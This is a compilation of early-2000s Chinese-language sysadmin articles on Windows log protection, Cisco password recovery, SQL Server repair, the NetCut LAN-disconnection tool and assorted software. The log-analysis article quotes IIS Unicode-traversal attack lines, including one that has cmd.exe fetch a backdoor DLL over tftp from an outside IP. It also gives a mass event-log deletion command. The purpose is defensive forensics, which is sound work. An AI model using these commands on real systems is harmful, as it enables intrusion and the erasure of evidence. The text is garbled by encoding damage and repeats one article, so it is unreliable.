安裝完Samba伺服器之後,網域中並不會馬上出現這臺伺服器,必須使用具備網域管理員權限的帳號加入該臺伺服器,才能順利讓伺服器登入網域,並且備份所有AD中的帳號資料。就整體架構而言,只有初次使用時較為麻煩,之後的設定就會相當簡易。
就網域管理而言,Samba的介面親和力不如Windows,但Samba的控管能力較好,可說是各佔勝場;在檔案伺服器這項主要功能而言,Windows Server 2003的效能就較佔劣勢,或許經過調校過的Windows Storage Server 2003就會有不同的效能表現了。
概述: Windows 系統日誌文件的保護、備份和分析
日期:2003-12-23
Windows系統以它的易用性倍受網管員的青睞,國內相當部分的大型網站都是用Windows 2000/XP系統建立的。Windows系統使用的人多了,研究它安全的人也多了。在此我要提醒一下網管們,雖然你補上了所有的安全補丁,但是誰又知道新的漏洞何時又會被發現呢?所以也應該做好系統日誌的保護工作。
作?黑客,他們也是最關心系統日誌的,一旦他們入侵成功,要做的第一件事就是刪除你的日誌文件,使你在被入侵後無法追蹤黑客行?,以及檢查黑客所做的操作行?。日誌文件就像飛機中的“黑匣子”一樣重要,因??堶惚O存著黑客入侵行?的所有罪證。
日誌的移位元與保護
Windows 2000的系統日誌文件包括:應用程式日誌、安全日誌、系統日誌、DNS服務日誌,以及FTP連接日誌和HTTPD日誌等。在默認情況下日誌文件大小?512KB,日誌保存的默認的位置如下:
安全日誌文件:%systemroot%system32config SecEvent.EVT
系統日誌文件:%systemroot%system32config SysEvent.EVT
應用程式日誌文件:%systemroot%system32config AppEvent.EVT
FTP連接日誌和HTTPD事務日誌:%systemroot% system32LogFiles,下面還有子文件夾,分別對應該FTP和Web服務的日誌,其對應的尾碼名?.Log。
在此筆者把系統默認?.EVT副檔名的日誌文件統稱為事件日誌,筆者看了好多文章介紹對事件日誌移位能做到很好的保護。移位雖是一種保護方法,但只要在命令行輸入dirc:*.evt/s(如系統安裝在D盤,則盤符?D),一下就可查找到事件日誌位置。日誌移位元要通過修改註冊表來完成,我們找到註冊表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置,下面的Application、Security、System幾個子鍵,分別對應“應用程式日誌”、“安全日誌”、“系統日誌”。如何修改註冊表,下面我們來看看Application子鍵。
File項就是“應用程式日誌”文件存放的位置,把此鍵值改?我們要存放日誌文件的文件夾,然後再把%systemroot%system32configappevent.evt文件拷貝到此文件夾,再重?機器。在此介紹移位元的目的是?了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位元也無法對文件進行安全設置操作,右擊移位後的文件夾選擇“屬性”,進入“安全”選項卡,不選擇“允許將來自父系的可繼承權限傳播給該物件”,添加“System”組,分別給Everyone組“讀取”許可權,System組選擇除“完全控制”和“修改”的許可權。然後再將系統默認的日誌文件512KB大小改?你所想要的大小,如20MB。
進行了上面的設置後,再直接通過Del C:*.Evt/s/q來刪除是刪不掉的;對系統正在使用的記錄文件在命令行形式中用上面的命令也是拒絕操作的。
日誌文件的備份
基於WMI技術的日誌備份腳本WMI(Windows Management Instrumentation)技術是微軟提供的Windows下的系統管理工具,基於WMI開發的腳本均可在Windows 2000/NT上成功運行。微軟提供了一個腳本,利用WMI將日誌文件大小設?25MB,並允許日誌自動覆蓋14天前的日誌。
我們只需把該腳本保存?.vbs副檔名的文件就可以使用,我們還可以修改上面的腳本來備份日誌文件,筆者在此建議,在備份日誌時一定將EVT的尾碼名改?其他尾碼保存(如.C),目的是讓攻擊者不易找到。
通過dumpel工具的備份
可用微軟Resource Kit工具箱中的dumpel.exe工具備份日誌文件,其格式?:
dumpel -f file [-s \server] [-l log [-m source]] [-e n1 n2 n3..] [-r]
[-t] [-dx]
-s \server 輸出遠端電腦日誌,如果是本地,這個可以省略。
-f filename 輸出日誌的位置和檔案名。
-l log log 可選?System,Security,Application,可能還有別的如DNS等。
如要把目標伺服器Server上的系統日誌轉存?Systemlog.log可以用如下格式:
dumpel \ server -l system -f Systemlog.log
如果利用計劃任務還可以實現定期備份系統日誌。
HTTPD事務日誌的分析
Microsoft的IIS5自公佈到現在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我們備份日誌的目的就是?了分析黑客入侵的行?,對於沒有打好補丁包的系統被黑客成功入侵的日誌記錄分別對應如下。
unicode漏洞入侵日誌記錄
我們打開IIS5的Web服務的日誌文件,日誌文件默認位置在%systemroot%system32LogFiles文件夾下,是一個典型的Unicode漏洞入侵行?的日誌記錄,對於正常的Web訪問,是通過80埠用GET命令獲取Web資料,但通過非法的字元編碼可繞過字元驗證而得到不應該得到的資訊。但補上相應的補丁可堵上此洞。
如通過下面的編碼查看目的機的目錄文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir200
則日誌中會記錄下此訪問行?:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
然而我們的日誌中記錄的一清二楚,是來自192.168.0.1的攻擊者查看我們的目錄。而下面一行是向我們的機器傳送後門程式的記錄:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll
502 -
WebDavx3遠端溢出日誌記錄
最近在黑客界有名的Wevdavx3漏洞是應用最廣泛的,連打了最新SP3補丁的系統也不放過。如果系統遭受了此遠端溢出的攻擊行?。
我們看到圖中這樣的一行資訊:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
就表示我們的Web服務受到了來自192.168.0.218的攻擊,並鎖定(即關閉)了WEB服務。後面的一些亂碼字元是在溢出攻擊時使用的偏移位猜過程。
上面都記錄了入侵行?的IP位址,此IP位址並不能排除是攻擊者使用了跳板,也就是說此IP很可能是“肉雞”而不是攻擊者的IP,但再查看其他日誌文件,還是有可能追查出攻擊者的位置。
資訊源:賽迪網 作者:徐建軍
FlashGet安全方式漏洞
描述:FlashGet的用戶名和密碼以明文方式存在註冊表,一般位置如下:
[HKEY_USERS.DEFAULTSoftwareJetCarJetCarDialUp] "Entry"="" "UserName"="" "Password"=hex:
針對Cisco常見路由器 密碼和版本恢復方法的探討
日期:2003-12-29
隨著互聯網規模的不斷擴大,網路與我們的生活已經越來越近,許多政府,學校和公司都組建了自己的資訊網路,這使得路由器這一網路設備的使用越來越廣泛。在使用路由器的過程中經常會出現忘記密碼的事情,使維護人員無法登錄,影響工作的進一步開展。同時,在操作過程中有時會因為一些意想不到的原因,將路由器內部的版本映象文件損壞,使路由器無法正常工作,路由器退回到監控狀態,使用常用的版本拷貝命令無法更新版本。這兩個問題都是較常見,但又是初學者感到比較棘手的問題。
對於版本的獲得一般可以通過網站下載,或與供應商聯繫提供,也可以在路由器正常工作時利用常規命令將版本備份到伺服器上,以備應急之用。CISCO 路由器品種較多,各種路由器的密碼恢復和版本的災難恢復情況又不同,現分別?述。
一. 2500系列路由器(以2509?例)
1. 密碼恢復
1.1 利用DB25轉換介面,和交叉線將2509路由器的CONSOLE口和電腦串口相連,?動電腦超級終端,設置其參數?串列傳輸速率9600,資料位元8,奇偶校驗?無,停止位?1,流控選擇無。開?路由器電源,在開機60秒內按ctlr+break 使路由器進入rom monitor 狀態,提示符 >
1.2 查看configure –register 值,並將該值記下。
>e/s2000002
返回值正常時一般?2102
1.3 更新configure-register 值使路由器?動時跳過配置文件,直接?動,以便使原來的密碼不起作用。
>o/r0x0142
1.4 重新啟動路由器>i
1.5 啟動後進入特權模式,執行如下命令使原來的配置資訊有效。
router(config)#config mem
1.6 此時可以按照正常操作查看原來的密碼,或修改為新的密碼。
1.7 將configure-register 值復原,並重新啟動路由器。此時即可恢復正常。
Router(config)#configure-register 0x2102
Router(config)#wri
Router(config)#reload
2. 版本災難性恢復
與其他路由器不同的是2509在rom內部有一個引導監控模式,內含一個小的映象版本,當flash中版本損壞時,可以用於正式版本下載。
2.1在電腦串口和2509CONSLOE 口相連的同時,還必須準備一個AUI 與RJ45的轉換介面,以便可以使用交叉線將AUI口與電腦網口相連。
2.2在引導監控模式下,進入特權模式,配置乙太口的介面位址和遮罩,使其與電腦網口位址在同一子網,(假定電腦位址位元168.1.32.206 255.255.0.0 路由器乙太口位址位元168.1.32.207 255.255.0.0)
router(boot)#config t
router(boot)(config)#int ethernet 0
router(boot)(config-if)#ip address 168.1.32.207 255.255.0.0
2.3驗證網路互通性
router(boot)#ping 168.1.32.206
2.4 電腦上?動tftp伺服器,將需要下載的版本放在伺服器的指定目錄下。
2.5 在超級終端上執行如下命令:
router(boot)#copy tftp flash
將新的版本下載到路由器的flash中,
2.6重新?動路由器,運行新的正常版本
router(boot)#reload
二. 2600系列(以2621 ?例)
1. 密碼恢復
1.1將路由器的CONSOLE口和電腦串口相連,?動電腦超級終端,開?路由器電源,在開機60秒內按ctlr+break 使路由器進入rom monitor 狀態,提示符
rommon1>
1.2重新配置組態寄存器
rommon1>confreg
當出現 do you wish to change the configuration (y/n) 時 選擇y
接下來的選項選擇n
當出現 enable”ignore system configuration information”(y/n) 選擇y
接下來的選項選擇n
1.3 重新?動路由器
rommon1>reset
1.4 ?動後進入特權模式,執行如下命令使原來的配置資訊有效。
router(config)#config mem
1.5可以進一步查看密碼或更改密碼
2. 版本的災難性恢復
2621 提供了兩種災難性恢復版本的方法,tftpdnld 和 xmodem 方式。
2.1 tftpdnld方式
2.1.1將電腦串口和路由器CONSLE口相連,將電腦網口與路由器乙太口(一定要與第一個乙太口)相連
2.1.2 ?動TFTP伺服器,並將要下載的版本放於指定目錄下面。
2.1.3 開?路由器電源,由於沒有有效版本,路由器?動後將直接進入監控模式。
Rommon1>
2.1.4按如下命令設置參數。
Rommon2>IP_ADDRESS=168.1.32.207
Rommon3>IP_SUBNET_MASK=255.255.0.0
Rommon4>DEFAULT_GATEWAY=168.1.32.206
Rommon5>TFTP_FILE=c2600-i-mz.121-3.T
Rommon6>tftpdnld
以上假定電腦位址?168.1.32.206 255.255.0.0,命令IP_ADDRESS=168.1.32.207
在監控模式下將168.1.32.207位址配置到路由器的第一個乙太埠,從而建立起路由器與TFTP伺服器之間的連接,正常下載版本。
2.1.5 組態配置寄存器
Rommon7>confreg
當出現do you wish to change the configuration ?y/n 選擇y
其他選擇n
當出現 change the boot charaterist ?y/n 選擇 y
選擇參數2
2.1.6?動版本
Rommon8> reset
2.2 xmodem 方式下載
該種方式下載不需要乙太口電纜,只需超級終端即可。缺點是花費時間太多,速度太慢。Xmodem 是個人電腦通信中廣泛使用的非同步文件傳輸協定,以128位元組塊的形式傳輸資料,並且每個塊都進行校驗,,如果接受方校驗正確,則發送認可資訊,發送方發送下一個字塊。Ymodem 非同步傳輸協定,傳輸字塊大小?1024,增加了批次處理的功能。
2.2.1 用超級終端與路由器連接好後,?動路由器,路由器進入監控模式狀態。
Rommon1>
2.2.2 ?動xmodem 命令
Rommon2>xmodem –cx ? 敲入enter鍵
當出現do you wish to continous 時 選擇y
2.2.3 打開超級終端的“傳送”功能表,選擇傳送文件 則打開了傳送文件窗口。
輸入版本文件的位置,並選擇xmodem 方式,確認後,經過幾秒後,版本文件則會以xmodem的方式從電腦下載到路由器中。
修改相應命令和選項,也可以以ymodem的方式進行傳送。
2.2.4 以上述同樣的方法配置confreg 命令,重新?動後,路由器會進入正常狀態。
三. 3600系列路由器的密碼和版本恢復(以3640?例)
1. 密碼恢復
3640的密碼恢復和26系列基本相似,都是進入監控模式,運行confreg 命令,?動時忽略配置文件,進行直接?動。此方法同樣適用於4500 7500 12000系列路由器。
2. 版本恢復
3640 的版本恢復沒有提供tftpdnld命令,只提供了xmodem 命令,使用方法與26系列相同。
四. 幾種進入ROM 狀態的方法
對於cisco的各種路由器進入rom狀態的方法不盡相同,但一般通過如下三種方法可以進入rom狀態 ,在使用過程中可以分別試用進入。
4.1如果break 未被遮罩,可以在開機60秒內按ctl+break 鍵中斷?動過程,進入rom狀態。
4.2 如果break鍵已經遮罩,可以通過迴圈開機的方法進入rom狀態。
方法是:路由器開機後,將電源關閉。間隔5秒後重新開機,一般會進入rom狀態。此方法適用與7500 12000等路由器。
4.3將超級終端通訊串列傳輸速率設置?1200,資料位元8 ,奇偶位1 停止位無。開?路由器電源,?動後,關機。停5秒後,重新開機,同時一直按住空白鍵12秒後放開,等路由器?動完成後,重新更改超級終端位元預設值。通訊串列傳輸速率設置?9600,資料位元8 ,奇偶位1 停止位無 。重新連接後,從終端上可以看到已經進入rom 狀態。注意在串列傳輸速率位元1200時終端上沒有內容顯示。此方法適用於2500,2600,4500等系列路由器
五 結束語
作?三層設備,路由器在網路中擔任著尋找路由的作用,但路由器又是一種技術含量很高的網路設備,涉及的各種協定,技術面較廣,熟練運用各種路由器,及時處理各種突發故障對維護網路的正常運轉有著重要意義。本文通過比較全面的匯總,總結了常見路由器的密碼和版本的恢復方法,對處理常見的類似問題具有一定的指導作用。
當SQL Server資料庫崩潰時如何恢復?
任何資料庫系統都無法避免崩潰的狀況,即使你使用了Clustered,雙機熱備……仍然無法完全根除系統中的單點故障,何況對於大部分用戶來說,無法承受這樣昂貴的硬體投資。所以,在系統崩潰的時候,如何恢復原有的寶貴資料就成?一個極其重要的問題了。
在恢復的時候,最理想的情況就是你的資料檔案和日誌文件都完好無損了,這樣只需要sp_attach_db,把資料檔案附加到新的資料庫上即可,或者在停機的時候把所有資料檔案(一定要有master等)都copy到原有路徑下也行,不過一般不推薦這樣的做法,sp_attach_db比較好,雖然麻煩許多。
但是呢,一般資料庫崩潰的時候系統是未必能有時間把未完成的事務和髒頁等寫入磁片的,這樣的情況sp_attach_db就會失敗。那?,寄期望於DBA制定了一個良好的災難恢復計劃吧。按照你的恢復計劃,還原最新的完全備份,增量備份或者事務日誌備份,然後如果你的活動事務日誌還能讀得出來的話,恭喜你!你可以還原到崩潰前的狀態。
一般的單位都是沒有專職的DBA的,如果沒有可用的備份,更可能是最近一次備份的時間過於久遠而導致不可接受的資料損失,而且你的活動事務日誌也處於不可用的狀態,那就是最麻煩的情況了。
不幸的很的是,一般資料庫崩潰都是由於存儲子系統引起的,而這樣的情況是幾乎不可能有可用的日誌用於恢復的。
那?就只好試一下這些方案了。當然,是要求至少你的資料檔案是存在的,要是資料檔案、日誌文件和備份都沒有了的話,別找我,你可以到樓頂上去唱“神啊,救救我吧”。
首先,你可以試一下sp_attach_single_file_db,試著恢復一下你的資料檔案,雖然能恢復的可能性不大,不過假如這個資料庫剛好執行了一個checkpoint的話,還是有可能成功的。
如果你沒有好到有摸彩票的手氣,最重要的資料庫沒有像你期盼的那樣attach上去,不要氣餒,還是有別的方案的。
我們可以試著重新建立一個log,先把資料庫設置?emergency mode,sysdatabases的status?32768 就表示資料庫處於此狀態。
不過系統表是不能隨便改的,設置一下先Use Master Go sp_configure 'allow updates', 1 reconfigure with override Go然後update sysdatabases set status = 32768 where name = ''
現在,祈求滿天神佛的保佑吧,重新建立一個log文件。成功的機會還是相當大的,系統一般都會認可你新建立的日誌。如果沒有報告什?錯誤,現在就可以松一口氣了。
雖然資料是恢復了,可是別以?事情就算完成了,正在進行的事務肯定是丟失了,原來的資料也可能受到一些損壞。
先把SQL Server 重新?動一下,然後檢查你的資料庫吧。
先設置成單用戶模式,然後做dbcc sp_dboption '', 'single user', 'true' DBCC CHECKDB('')
如果沒有什?大問題就可以把資料庫狀態改回去了,記得別忘了把系統表的修改選項關掉。
update sysdatabases set status = 28 where name = '' ——當然你的資料庫狀態可能不是這個,自己改?合適的值吧。也可以用sp_resetstatus go sp_configure 'allow updates', 0 reconfigure with override Go
checkdb的時候可能報告有一些錯誤,這些錯誤的資料你可能就只好丟棄了。
checkdb有幾種修復選項,自己看著用吧,不過最後你可能還是得REPAIR_ALLOW_DATA_LOSS,完成所有修復。
chekcdb並不能完成所有的修復,我們需要更進一步的修復,用DBCC CHECKTABLE對每一個表做檢查吧。
表的列表可以用sysobjects?堶控o到,把OBJECTPROPERTY是IsTable的全部找出來檢查一下吧,這樣能夠基本上解決問題了,如果還報告錯誤,試著把資料select into到另一張表檢查一下。
這些都做完了之後,把所有索引、視圖、存儲過程、觸發器等重新建立一下。DBCC DBREINDEX也許可以幫你一些忙。
上面提到的命令、物件在Books Online中均有詳細說明,請注意參看。
NetCut網管效率一級棒
無論是在公司的大網路,或是家裡三五台電腦的小小網路,負責管理的人總會遇到一些困擾,像小張整天都在下載色情影片占用頻寬,小雪則是上班時間都在ICQ情話綿綿,家裡的小孩則是常常RO到兩三點……。
身為網管(或家管)的你,難道就真的無計可施了嗎?
Arcai公司的「網路斷線器」NetCut產品就是專門針對這種需求而設計的。下載處:seeder .net/lee/dl安裝完後要重新開機一次 ,點取桌面上的NetCut圖示即可進入主程式。程式執行後,會自動搜尋你的整個內部網路,將找到的每一台電腦的名稱及IP位址和網卡位址都列在左邊,而網路的閘道器(Router)則列在右邊。
「網路斷線器」顧名思義就是可以讓你將網段中的任何一台電腦對外連線切斷!你只要在左邊清單中選取要切斷連線的主機,按下Cut Off按鈕,那台電腦就此不能上網了!(要讓他恢復連線只要按下Resume鍵即可)
如果你是要讓某兩台電腦之間不能通訊的話,你要做的就不是切斷他們的Internet連線,而是要切斷他們彼此的連線:首先把右邊的 G ateway 位址按Del GateWay刪除,然後點選要切線的其中一員按>>鈕移到右邊,再於左邊點取另一位後,按Cut Off就可以切斷這兩點之間的連線了。
「網路斷線器」雖然是網管的必殺利器,但如果使用的人是存心搗蛋的人,也一樣輕易的就可以把整個網路搞得雞飛狗跳。改天若您遇到了網路時通時不通的靈異現象時,別忘了也要祭出NetCut這個絕活,仔細核對上面的網卡號碼IP位址就可以抓出頑皮的傢伙囉!
硬碟容量變大了
現在一顆160G的硬碟只要四千出頭,這麼大的容量用的著嗎?別忘了資訊界的一句名言:「硬碟愈大愈不夠大!」隨著硬碟容量的攀升,軟體及遊戲也肥腫了起來,更別提拚命下載來的大量MP3及影片要都要占用極大的容量。
硬碟當然愈大愈好,但舊的ATA硬碟規格卻有 137GB的容量上限!雖然新的主機板及ATA硬碟都開始支援新的48bit LBA規格讓硬碟容量限制已放寬到天文數字般的 144155188 GB了,然而如果你真買一台大於137GB的硬碟裝在你新買的電腦上,恐怕馬上會因為Windows不支援這麼大的硬碟而被嚇一大跳!
真的不支援嗎?事實上Windows 2000在SP3後就開始支援超大型ATA硬碟了,而Windows XP則在SP1之後也提供了超大容量ATA硬碟的支援。如果你不確定你的視窗版本,點開始→執行輸入Winver然後按Enter即可看到目前使用中的W indows版本及Service Pack版號。 (註: 如果版號較舊,建議立即做視窗更新Windows Upda te來更新你的Windows至最新狀態)
不幸的是:就算你的Windows已更新至最新狀態,大於137GB的硬碟還是沒辦法直接使用!這是因為微軟沒有把這隱藏功能啟動。要啟用此功能,要先執行Regedit登錄編輯程式,然後找到這個選項:
HKEY_LOCAL_MACHINE\System\CurrentContr olSet\Services\Atapi
在Parameters上按滑鼠右鍵選新增→DWORD值,然後命名為EnableBigLba,命名完後點兩下 EnableBigLba將值填為1就搞定了!(設好後要關機重開才生效)
若覺得太複雜的話直接下載執行Lee-1.com/ DL/BigDisk.reg 即可。
第一款針對Linux平臺設計的完整資料保護解決方案
CA BrightStor ARCserve Backup v9 for Linux
根據資策會的調查,國內有超過三成以上的企業和機關團體,所使用的網頁伺服器是建構在Linux平臺上,Linux作業系統的資料保護已成為軟體廠商重視的市場。CA(組合國際)推出的BrightStor ARCserve Backup v9 for Linux,便是針對中小企業Linux用戶資料保護需求設計的備分軟體。
在Linux環境下執行資料備分,管理者最常用的方法是利用tar、cpio等指令,將資料備分至磁帶機或磁碟,並配合shell script、crontab將備分工作自動化,不過上述的方法僅具備單純的備分/還原功能。雖然市面上也有支援Linux的備分,但僅限於代理程式(agent),並無完整的解決方案。BrightStor ARCserve Backup v9 for Linux(以下簡稱BAB9 for Linux)則是第一款專門針對Linux備分伺服器設計的備分軟體。
簡化的安裝授權程序
有別於BAB9另外兩個版本-Windows和Novell版本圖形介面安裝精靈的安裝方式,BAB9 for Linux必須在文字模式下,以輸入指令的方式進行安裝,不過安裝過程並不複雜。將安裝光碟置入光碟機並掛載之後,輸入安裝檔的路徑並執行即可。由於BAB9 for Linux已預先將大部分使用者會安裝的套件整理好,如果不是特殊情況,安裝過程通常只要透過文字導引,選擇預設值安裝即可。授權驗證模式也相當簡單,以測試時安裝的試用版光碟為例,安裝過程中會要求輸入序號,選擇不輸入序號跳過的話仍可順利安裝完成,不過僅提供一個月的試用期,在試用期間輸入授權碼即可轉成正式版。
BAB9 for Linux的安裝過程也相當快,筆者的測試平臺配備為Pentium 4 2.4GHz處理器、512MB記憶體和Red Hat 8.0作業系統,從開始安裝到啟動費時不到半小時。不過需注意的是,安裝前最好先詳細讀過安裝光碟內附的使用手冊,確認軟硬體的需求和相容性,尤其要注意BAB9 for Linux安裝必備的軟體套件,筆者在第一次安裝時,就因為少了Korn shell package(pdksh)而無法安裝成功,著實費了一番工夫才安裝起來。
透過IE即可操作管理
BAB9 for Linux提供兩種操作模式,一種是在本機端透過圖形介面管理,另一種則是透過啟動Java Applet的IE網路瀏覽器,登入管理網頁進行操作。為確保安全性,BAB9 for Linux具備兩層防護機制,首先是透過埠號管制,軟體預設的埠號為6060,使用者可自行定義,如果埠號不符,就算登入也無法正常使用;連線進入管理畫面之後,使用者必須輸入管理員的帳號密碼,認證通過之後才能操作。
使用過BAB9 for Windows版本的使用者會發現,兩者的操作介面幾乎是一模一樣,BAB9 for Linux同樣擁有多種精靈模式,像是備分/回存精靈、設備精靈、工作排程精靈等,協助使用者快速完成各項設定。BAB9 for Linux亦具備日曆式的工作排程介面,管理者只需用滑鼠點選,就可以輕鬆制定所需的備分政策。使用者更可透過類似檔案總管的管理控制臺,集中管理和監控多臺伺服器和儲存設備,無論伺服器採用的是Windows、Unix或Linux作業系統,皆可跨平臺管理,而且只要取得伺服器認證,就可從本機管理遠端的備分伺服器。
支援多項特殊功能
BAB9 for Windows所具備的一些獨家特殊功能,在BAB9 for Linux上同樣看得到,例如支援多重網路卡功能,可協助企業建立專屬的備分網路,將網路上的商業流量和資料保護流量分開,避免備分工作造成網路壅塞;支援備分資料至硬碟的虛擬磁帶庫功能,利用磁碟備分速度較快的特性,先將備分資料暫存至指定的磁碟空間,再備分至磁帶,以增加備分效率;支援NDMP(Network Data Management Protocol,網路資料管理協定),可利用NAS做為備分媒體,將資料快速備分在NAS上。
由於病毒猖獗,備分時很難確定備分資料是否有毒,有時甚至連備分伺服器自己都中毒,造成嚴重的資料損毀,有鑒於此,BAB9 for Linux整合了CA eTrust Antivirus病毒掃描引擎,可在資料轉移至儲存媒體前先行掃描是否有病毒,並加以修復或清除,雖然啟用掃毒機制會增加些許備分時間,不過為了安全起見卻是必要的。病毒掃描引擎同時也會自動更新病毒碼,確保不受最新病毒的威脅。
BAB9 for Linux另一項重要功能,是可透過選購的代理程式,線上(on-line)保護資料庫及網頁伺服器。一般Linux的備分指令或備分工具,僅能提供離線(off-line)備分功能,對於需要全天候運作的資料庫及網站來說,常會造成管理上的困擾。
一般Linux平臺上最多人使用的網頁伺服器軟體是Apache,而資料庫不外乎是MySQL和Oracle,BAB9 for Linux便提供以上三種軟體的代理程式,利用線上備分代理程式,可在網頁伺服器及資料庫運作的同時進行備分,毫不影響正在進行的工作,提供伺服器7天24小時的完整資料保護。
災難復原功能
導致伺服器停機的原因不一而足,可能是硬體故障、軟體中毒,也可能天災人禍等不可抗力因素,對系統管理者而言,最重要的問題是如何在災難發生後,用最快的時間恢復伺服器的正常運作,降低企業損失。
BAB9 for Linux支援的災難復原套件(Disaster Recovery Option),可以提供使用者在不需重新安裝作業系統和備分軟體情況下,迅速重建Linux的Ext3檔案系統及LILO、GRUB開機管理程式。
使用者需至CA網站下載ISO檔並自行燒錄成可開機光碟,並在平時準備好由BAB9 for Linux製作的開機軟碟片和全系統完整備分的磁帶,一旦伺服器停擺,只要依程序以軟碟和光碟開機之後,照著畫面的指示即可將系統還原至健康狀態。
DeviceLock 讓網管人員輕鬆設定硬體周邊的使用權限
------------------------------------
軟體分類: 安全防護
軟體性質: Shareware
更新日期: 2003-12-17
最近版本: 5.51
作業系統: Windows XP/2000/NT
語言界面: 英文
檔案容量: 1.6 M
購買金額: 美金 35 元
試用限制: 15 天
原創公司: SmartLine Inc.
------------------------------------
DeviceLock 讓網管(網路管理)人員可以指定哪些使用者可以使用哪些電腦的硬體周邊(如:Ports、軟碟機、MO 等等)。
Windows 一旦安裝 DeviceLock 之後,網管就可以像設定檔案分享一樣容易的設定 LPT port、COMs、CD-ROM 等等硬體周邊的使用權限。
除了設定硬體的使用權限之外,DeviceLock 也可以充分利用緩衝記憶體(Buffers),這項功能對印表機、MO 這種週邊設備是很有用的。另外,DeviceLock 也可以管理周邊設定以及 NTFS 磁碟分割的相關資訊。
DeviceLock 的主要特點如下:
讓網管可以依照使用者或使用群組設定特定週邊設備的使用權限。
獲知硬體周邊的相關資訊,如:檔案系統、磁碟分割。
支援遠端遙控。
支援 Y2K。
多語系控制介面(不過沒有中文介面)。
DeviceLock 的使用介面和檔案總管相當類似,對於熟悉 Windows 的網管人員來說應該是相當容易使用的。
請注意,DeviceLock Me 適用於 Windows 9x/me,DeviceLock 適用於 Windows NT/2000/XP,請選擇適當的版本下載。
直接到toget下載
SpySites 善用 IE 安全性設定 阻止你瀏覽危險網站
------------------------------------
軟體分類: www工具
軟體性質: Freeware
更新日期: 2003-12-17
最近版本: 1.0
作業系統: Windows XP/2000/Me/98/95/NT
語言界面: 英文
檔案容量: 570 K
原創公司: Camtech 2000
------------------------------------
SpySites 提供數千個「限制的網站」網站的名單,讓你將這個名單匯入 IE 中,還幫你更改「限制的網站」裡面的安全性設定,讓用 IE 瀏覽更安全(一點∼)。
如果你曾經調整過 IE 的設定,你應該會注意到「安全」頁籤。「安全」頁籤可以讓你將網站分類,並對不同類別的網站實施不同層級的安全控管,如果你只有調整「網際網路」中的選項,你做的任何改變都會套用到所有的網站,如果你要針對素行不良的網站做設定,你應該在「限制的網站」中設定。
問題來了,要讓「限制的網站」能發揮作用,你需要先輸入這些網站的列表才行,要怎麼樣才能不必發揮「神農氏嘗百草」的精神,遇到一個「才」殺一個(等中獎就來不及了吧∼)?這時,你就需要 SpySites 來為你管理「限制的網站」設定了。
SpySites 提供數千個夠格進入「限制的網站」網站的名單(你也可以自己新增),讓你輕鬆地將這個名單匯入 IE 中,還幫你更改「限制的網站」裡面的安全性設定,讓這些網站無法安裝 / 執行:
1、綁架你的首頁 / 搜尋頁面
2、ActiveX 控制項
3、Java applets
4、JavaScript
5、Cookies
6、新增桌面圖示
7、使用電子郵件帳號作為登入 FTP 伺服器的密碼
8、不通知你就自行安裝奇怪的軟體
以後如果你不小心瀏覽這些在黑名單上的網站,雖然可能還是會有跳出式視窗跑出來,不過,除此之外,其他的(不良)行為通通會被 IE 擋下來喔∼。原作者另外有一套 SpySites Plus, 提供 cookie/ 限制網站 管理等額外的功能,若有需要可以向作者購買。
直接到toget下載
網路上的芳鄰會不會增加被駭的機會?
如果是 win2000/xp, 去 TCP/IP 把 NetBIOS over TCP/IP 選項停用,這樣子電腦名稱就不會出現在網路芳鄰, 但是仍舊可以用 \\[ip]\ 方式使用。另外去把認證機制改 NTLM v2 ........應該會安全一點,其實分享檔案可以改用 ftp ...... 印表機乾脆改用支援網路印表機的分享器好了。
NetCut網管效率一級棒
無論是在公司的大網路,或是家裡三五台電腦的小小網路,負責管理的人總會遇到一些困擾,像小張整天都在下載色情影片占用頻寬,小雪則是上班時間都在ICQ情話綿綿,家裡的小孩則是常常RO到兩三點……。
身為網管(或家管)的你,難道就真的無計可施了嗎?
Arcai公司的「網路斷線器」NetCut產品就是專門針對這種需求而設計的。下載處:seeder .net/lee/dl安裝完後要重新開機一次 ,點取桌面上的NetCut圖示即可進入主程式。程式執行後,會自動搜尋你的整個內部網路,將找到的每一台電腦的名稱及IP位址和網卡位址都列在左邊,而網路的閘道器(Router)則列在右邊。
「網路斷線器」顧名思義就是可以讓你將網段中的任何一台電腦對外連線切斷!你只要在左邊清單中選取要切斷連線的主機,按下Cut Off按鈕,那台電腦就此不能上網了!(要讓他恢復連線只要按下Resume鍵即可)
如果你是要讓某兩台電腦之間不能通訊的話,你要做的就不是切斷他們的Internet連線,而是要切斷他們彼此的連線:首先把右邊的 G ateway 位址按Del GateWay刪除,然後點選要切線的其中一員按>>鈕移到右邊,再於左邊點取另一位後,按Cut Off就可以切斷這兩點之間的連線了。
「網路斷線器」雖然是網管的必殺利器,但如果使用的人是存心搗蛋的人,也一樣輕易的就可以把整個網路搞得雞飛狗跳。改天若您遇到了網路時通時不通的靈異現象時,別忘了也要祭出NetCut這個絕活,仔細核對上面的網卡號碼IP位址就可以抓出頑皮的傢伙囉!
快下載免費安全套餐!
在今年底的Comdex大展裡,微軟宣布一個好消息:免費贈送全球Windows用戶C A知名的安全套餐軟體—「eTrust EZ Armor」。
EZ Armor除了兼具防毒軟體及防火牆兩大功能之外,EZ Armor也能阻攔網頁廣告並在瀏覽網站時保護個人隱私,最重要的是:天下既然有白吃的午餐,我們就去註冊下載吧:
http://www.my-etrust.com/microsoft/reg ister_cart_ms.cfm
